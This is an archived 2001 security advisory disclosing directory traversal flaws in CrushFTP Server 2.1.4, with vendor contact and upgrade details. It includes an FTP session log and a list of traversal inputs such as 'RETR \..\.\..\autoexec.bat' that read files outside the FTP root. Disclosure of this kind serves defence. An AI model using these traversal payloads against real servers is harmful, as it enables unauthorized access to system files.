Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
From: joetestaHUSHMAIL.COM
Date: Thu May 03 2001 - 16:13:40 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerabilities in CrushFTP Server


    CrushFTP Server 2.1.4 is a java ftp server available from
    http://www.crushftp.com. Multiple vulnerabilities exist which allow
    users to change directories outside of the ftp root and download files.


    The following is an illustration of the problem. An ftp root of
    "c:\directory\directory" was used.

    >ftp localhost
    Connected to xxxxxxxxxx.rh.rit.edu.
    220-Welcome to CrushFTP!
    220 CrushFTP Server Ready.
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Username OK. Need password.
    230 Password OK. Connected.
    ftp> get ../../autoexec.bat
    200 PORT command successful.
    150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
    226-Download File Size:419 bytes 0K/sec.
    226 Transfer complete.
    ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
    ftp> cd ...
    250 "/.../" CWD command successful.
    ftp> get command.com
    200 PORT command successful.
    150 Opening ASCII mode data connection for command.com (93890 bytes).
    226-Download File Size:93890 bytes 92K/sec.
    226 Transfer complete.
    ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

    The vendor issued two versions since I made initial contact to address
    additional variations. The following is a list of vulnerabilities which
    affected these intermediate versions (v2.1.5, v2.1.6):

    NLST ..
    NLST ...
    SIZE /../../
    SIZE /.../
    NLST \..\
    NLST /../
    NLST \...\
    RETR \..\.\..\autoexec.bat
    RETR ./\...\autoexec.bat
    RETR .\.\..\..\autoexec.bat


    Upgrade to v2.1.7 at:

        Vendor Status

    The program author, Ben Spink, was contacted via <spinkbmac.com> on
    Friday, April 20, 2001. I would like to thank him for taking this
    matter seriously and showing extra effort to resolve these problems.

        - Joe Testa

    e-mail: joetestahushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

    ----- Begin Hush Signature v1.3 -----
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

    Free, encrypted, secure Web-based email at www.hushmail.com